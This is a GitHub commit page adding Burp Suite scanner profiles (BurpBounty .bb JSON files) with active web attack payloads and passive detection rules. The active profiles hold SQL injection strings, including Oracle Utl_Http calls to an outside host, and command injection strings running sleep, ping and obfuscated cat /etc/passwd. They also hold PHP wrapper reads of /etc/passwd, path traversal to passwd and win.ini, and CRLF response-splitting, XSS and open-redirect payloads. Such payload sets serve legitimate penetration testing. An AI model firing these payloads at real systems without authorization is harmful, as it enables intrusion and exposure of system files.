Skip to content

Commit

Permalink
Burpsuite Intruder Payloads by [email protected]
Browse files Browse the repository at this point in the history
  • Loading branch information
WP Engine Marketing committed Oct 21, 2018
1 parent b5bb229 commit c46c0ff
Show file tree
Hide file tree
Showing 29 changed files with 4,655 additions and 0 deletions.
Binary file added BurpAttacks/01_burpattack_dirbuster_toplist
Binary file not shown.
1 change: 1 addition & 0 deletions BurpBountyPayloads/ACTIVE - HTTP Interaction.bb
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[{"Name":"ACTIVE - HTTP Interaction","Active":true,"Scanner":1,"Payloads":["INJECTX.burpcollaborator.net","http://INJECTX.burpcollaborator.net","https://INJECTX.burpcollaborator.net","//INJECTX.burpcollaborator.net"],"Encoder":["URL-encode key characters"],"UrlEncode":true,"CharsToUrlEncode":"\" ?\u0026","Grep":["Burp Collaborator Server"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":5,"rCookies":false,"spaceEncode":false,"payloadPosition":1,"sEncode":"","payloadsFile":"","grepsFile":"","IssueName":"HTTP Interaction","IssueSeverity":"Medium","IssueConfidence":"Tentative","IssueDetail":"HTTP Interaction","RemediationDetail":"HTTP Interaction","IssueBackground":"HTTP Interaction","RemediationBackground":"HTTP Interaction"}]
1 change: 1 addition & 0 deletions BurpBountyPayloads/ACTIVE - HTTP Response Splitting.bb
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[{"Name":"ACTIVE - HTTP Response Splitting","Active":true,"Scanner":1,"Payloads":["INJECTX%0d%0aSet-Cookie:INJECTX123;%0d%0a","INJECTX%0aSet-Cookie:INJECTX123;%0a","INJECTX\\u{0120}HTTP/1.1\\u{010D}\\u{010A}Host:\\u{0120}crowdshield.com\\u{010D}\\u{010A}\\u{010D}\\u{010A}GET\\u{0120}/.injectx/r.php?http_split"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Set-Cookie: INJECTX123","Set-Cookie:INJECTX123"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":1,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":1,"sEncode":"","payloadsFile":"","grepsFile":"","IssueName":"HTTP Response Splitting","IssueSeverity":"Medium","IssueConfidence":"Tentative","IssueDetail":"HTTP Response Splitting","RemediationDetail":"HTTP Response Splitting","IssueBackground":"HTTP Response Splitting","RemediationBackground":"HTTP Response Splitting"}]
1 change: 1 addition & 0 deletions BurpBountyPayloads/ACTIVE - Open Redirect.bb
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[{"Name":"ACTIVE - Open Redirect (Firm)","Active":true,"Scanner":1,"Payloads":["https://xerosecurity.com"],"Encoder":["URL-encode key characters"],"UrlEncode":true,"CharsToUrlEncode":" ?\u0026#:/\\","Grep":["Location: https://xerosecurity.com","\u003cmeta http-equiv"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":5,"rCookies":false,"spaceEncode":false,"payloadPosition":1,"sEncode":"","payloadsFile":"","grepsFile":"","IssueName":"Open Redirect (Firm)","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Open Redirect (Firm)","RemediationDetail":"Open Redirect (Firm)","IssueBackground":"Open Redirect (Firm)","RemediationBackground":"Open Redirect (Firm)"}]
1 change: 1 addition & 0 deletions BurpBountyPayloads/ACTIVE - Reflected Values.bb
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[{"Name":"ACTIVE - Reflected Values Found","Active":true,"Scanner":1,"Payloads":["INJECTX"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["INJECTX"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":true,"ResponseCode":"200","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Reflected Values","IssueSeverity":"Low","IssueConfidence":"Certain","IssueDetail":"Reflected Values","RemediationDetail":"Reflected Values","IssueBackground":"Reflected Values","RemediationBackground":"Reflected Values"}]
1 change: 1 addition & 0 deletions BurpBountyPayloads/ACTIVE - Remote Code Execution.bb
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[{"Name":"ACTIVE - Remote Code Execution","Active":true,"Scanner":1,"Payloads":["phpinfo()","a\u003de; b\u003dt; c\u003dc; d\u003dp; e\u003da; f\u003ds; g\u003dw; h\u003dd; cat /$a$b$c/$d$e$f$f$g$h","data://text/plain;base64,cGhwaW5mbygpCg\u003d\u003d","php://filter/convert.base64-encode/resource\u003d/etc/passwd",";cat$u+/etc$u/passwd$u","sleep 5","$(sleep 5)","INJECTX;sleep 5","INJECTX;sleep 5","INJECTX|sleep 5","INJECTX||sleep 5","INJECTX \u0026\u0026 sleep 5","INJECTX|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\u0027 |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\\\" |ping -n 21 127.0.0.1 "],"Encoder":["URL-encode key characters"],"UrlEncode":true,"CharsToUrlEncode":" \u0026?\"\u003d#","Grep":["$_SERVER","Registered Stream Filters ","INJECTX123","root:x:"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":1,"sEncode":"","payloadsFile":"","grepsFile":"","IssueName":"RCE","IssueSeverity":"High","IssueConfidence":"Tentative","IssueDetail":"RCE","RemediationDetail":"RCE","IssueBackground":"RCE","RemediationBackground":"RCE"}]
1 change: 1 addition & 0 deletions BurpBountyPayloads/ACTIVE - SQL Injection (Blind).bb
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[{"Name":"ACTIVE - SQL Injection (Blind)","Active":true,"Scanner":1,"Payloads":["\u0027 OR SLEEP(5)--","1\u0027 OR SLEEP(5)--","x\u0027 OR SLEEP(5)--","1\" OR SLEEP(5)--","x\u0027 waitfor delay \u00270:0:10\u0027--","1 waitfor delay \u00270:0:10\u0027--","1||Utl_Http.request(\u0027https://crowdshield.com/.injectx/r.php?sqli\u0027) from dual--","1\u0027||Utl_Http.request(\u0027https://crowdshield.com/.injectx/r.php?sqli\u0027) from dual--","1\u0027) AND SLEEP(5) AND (\u0027x\u0027\u003d\u0027x","1\") AND SLEEP(5) AND (\"x\"\u003d\"x","1 AND SLEEP(5)","x AND SLEEP(5)","1 AND waitfor delay \u00270:0:10\u0027","X AND waitfor delay \u00270:0:10\u0027","(select*from(select(sleep(20)))a)","1-sleep/*f*/(10)","1-if(mid(version/*f*/(),1,1)\u003d5,sleep/*f*/(5),0)","1-if(mid(version/*f*/(),1,1)\u003d4,sleep/*f*/(5),0)","1\u0027+AND+SLEEP(5)+AND+\u0027aaxA\u0027\u003d\u0027aaxA","test\u0027 RLIKE (SELECT (CASE WHEN (9203\u003d9203) THEN 0x74657374 ELSE 0x28 END))-- YOJb"],"Encoder":["URL-encode key characters"],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["INJECTX321"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":5,"rCookies":false,"spaceEncode":true,"payloadPosition":1,"sEncode":"+","payloadsFile":"","grepsFile":"","IssueName":"SQL Injection (Blind Based)","IssueSeverity":"High","IssueConfidence":"Tentative","IssueDetail":"SQL Injection (Blind Based)","RemediationDetail":"SQL Injection (Blind Based)","IssueBackground":"SQL Injection (Blind Based)","RemediationBackground":"SQL Injection (Blind Based)"}]
1 change: 1 addition & 0 deletions BurpBountyPayloads/ACTIVE - SQL Injection (Error).bb
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[{"Name":"ACTIVE - SQL Injection","Active":true,"Scanner":1,"Payloads":["\u0027","\""],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Incorrect syntax near","SQL syntax","ORA-"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":true,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":5,"rCookies":false,"spaceEncode":false,"payloadPosition":1,"sEncode":"","payloadsFile":"","grepsFile":"","IssueName":"SQL Injection","IssueSeverity":"High","IssueConfidence":"Tentative","IssueDetail":"SQL Injection","RemediationDetail":"SQL Injection","IssueBackground":"SQL Injection","RemediationBackground":"SQL Injection"}]
1 change: 1 addition & 0 deletions BurpBountyPayloads/ACTIVE - Traversal.bb
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[{"Name":"ACTIVE - Traversal","Active":true,"Scanner":1,"Payloads":["..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini","../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd","/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/","/mnt/././../etc/././passwd","/etc/.\\/\\/\\/\\/\\/passwd","/etc/.\\/.\\/.\\/.\\/passwd","/\\e\\t\\c/passwd","/et$\u0027c/pa\\u0000/notexist/path\u0027sswd","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/ %uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/ %uff0e%uff0e/etc/passwd","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/winnt/win.ini","\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00test.htm"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["for 16-bit app support","root:x:","boot loader"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":5,"rCookies":false,"spaceEncode":false,"payloadPosition":1,"sEncode":"","payloadsFile":"","grepsFile":"","IssueName":"Traversal","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Traversal","RemediationDetail":"Traversal","IssueBackground":"Traversal","RemediationBackground":"Traversal"}]
1 change: 1 addition & 0 deletions BurpBountyPayloads/ACTIVE - XSS.bb
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[{"Name":"ACTIVE - XSS","Active":true,"Scanner":1,"Payloads":["\u003c/INJECTX\u003e(1)","\"\u003e\u003c/INJECTX\u003e(1)"],"Encoder":["URL-encode key characters"],"UrlEncode":true,"CharsToUrlEncode":" \"\u003d?\u0026#","Grep":["\u003c/INJECTX\u003e(1)","\"\u003e\u003c/INJECTX\u003e(1)\u003e"],"PayloadResponse":false,"NotResponse":false,"NotCookie":true,"CaseSensitive":false,"ExcludeHTTP":true,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":true,"ResponseCode":"200","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":5,"rCookies":false,"spaceEncode":false,"payloadPosition":1,"sEncode":"","payloadsFile":"","grepsFile":"","IssueName":"XSS","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"XSS","RemediationDetail":"XSS","IssueBackground":"XSS","RemediationBackground":"XSS"}]
1 change: 1 addition & 0 deletions BurpBountyPayloads/PASSIVE - Basic Auth Check.bb
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[{"Name":"PASSIVE - Basic Auth Enabled","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["WWW-Authenticate","Basic realm"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Basic Auth Check","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Basic Auth Check","RemediationDetail":"Basic Auth Check","IssueBackground":"Basic Auth Check","RemediationBackground":"Basic Auth Check"}]
1 change: 1 addition & 0 deletions BurpBountyPayloads/PASSIVE - CMS Detection.bb
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[{"Name":"PASSIVE - CMS Detection","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Wordpress","Drupal","Joomla","Magento","concre5","SharePoint","django","XOOPS","wp-","BigCommerce","Weebly","Ecwid","3dcart","WooCommerce"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"CMS Detected","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"CMS Detected","RemediationDetail":"CMS Detected","IssueBackground":"CMS Detected","RemediationBackground":"CMS Detected"}]
1 change: 1 addition & 0 deletions BurpBountyPayloads/PASSIVE - Cisco ASA Device Found.bb
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[{"Name":"PASSIVE - Cisco ASA Device Found","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["+CSCOE+"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Cisco ASA Device Found (Passive)","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Cisco ASA Device Found (Passive)","RemediationDetail":"Cisco ASA Device Found (Passive)","IssueBackground":"Cisco ASA Device Found (Passive)","RemediationBackground":"Cisco ASA Device Found (Passive)"}]
1 change: 1 addition & 0 deletions BurpBountyPayloads/PASSIVE - Credentials Found.bb
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[{"Name":"PASSIVE - Credentials Found","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["username","password"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Credentials Found","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Credentials Found","RemediationDetail":"Credentials Found","IssueBackground":"Credentials Found","RemediationBackground":"Credentials Found"}]
1 change: 1 addition & 0 deletions BurpBountyPayloads/PASSIVE - Forgot Password Form.bb
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[{"Name":"PASSIVE - Forgot Password Form","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Forgot your password","Forgot password","Forgot email","Forgot username"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Forgot Password Form","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Forgot Password Form","RemediationDetail":"Forgot Password Form","IssueBackground":"Forgot Password Form","RemediationBackground":"Forgot Password Form"}]
1 change: 1 addition & 0 deletions BurpBountyPayloads/PASSIVE - Form Submission Found.bb
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[{"Name":"PASSIVE - Form Submission Found","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["\u003cform "],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Form Submission Found","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Form Submission Found","RemediationDetail":"Form Submission Found","IssueBackground":"Form Submission Found","RemediationBackground":"Form Submission Found"}]
1 change: 1 addition & 0 deletions BurpBountyPayloads/PASSIVE - Interesting Pages.bb
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[{"Name":"PASSIVE - Interesting Pages","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Login","Register","Lost your password","Reset password","Username","Password","admin","Sign Up","Signin"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Interesting Pages","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Interesting Pages","RemediationDetail":"Interesting Pages","IssueBackground":"Interesting Pages","RemediationBackground":"Interesting Pages"}]
1 change: 1 addition & 0 deletions BurpBountyPayloads/PASSIVE - Java De-Serialization.bb
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[{"Name":"PASSIVE - Java De-Serialization","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["javax.faces.ViewState"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Java De-Serialization","IssueSeverity":"Medium","IssueConfidence":"Tentative","IssueDetail":"Java De-Serialization","RemediationDetail":"Java De-Serialization","IssueBackground":"Java De-Serialization","RemediationBackground":"Java De-Serialization"}]
1 change: 1 addition & 0 deletions BurpBountyPayloads/PASSIVE - Jenkins Found.bb
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[{"Name":"PASSIVE - Jenkins Found","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Jenkins"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Jenkins Found","IssueSeverity":"Medium","IssueConfidence":"Tentative","IssueDetail":"Jenkins Found","RemediationDetail":"Jenkins Found","IssueBackground":"Jenkins Found","RemediationBackground":"Jenkins Found"}]
1 change: 1 addition & 0 deletions BurpBountyPayloads/PASSIVE - Login Page Found.bb
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[{"Name":"PASSIVE - Login Page Found","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Login"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Login Page Found","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Login Page Found","RemediationDetail":"Login Page Found","IssueBackground":"Login Page Found","RemediationBackground":"Login Page Found"}]
1 change: 1 addition & 0 deletions BurpBountyPayloads/PASSIVE - Private Key Found.bb
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[{"Name":"PASSIVE - Private Key Found","Active":true,"Scanner":1,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["PRIVATE KEY"],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Private Key Found","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Private Key Found","RemediationDetail":"Private Key Found","IssueBackground":"Private Key Found","RemediationBackground":"Private Key Found"}]
1 change: 1 addition & 0 deletions BurpBountyPayloads/PASSIVE - Redirect Found.bb
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[{"Name":"PASSIVE - Redirect Found","Active":true,"Scanner":2,"Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Location: "],"PayloadResponse":false,"NotResponse":false,"NotCookie":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"rCookies":false,"spaceEncode":false,"payloadPosition":0,"IssueName":"Redirect Found","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Redirect Found","RemediationDetail":"Redirect Found","IssueBackground":"Redirect Found","RemediationBackground":"Redirect Found"}]
Loading

0 comments on commit c46c0ff

Please sign in to comment.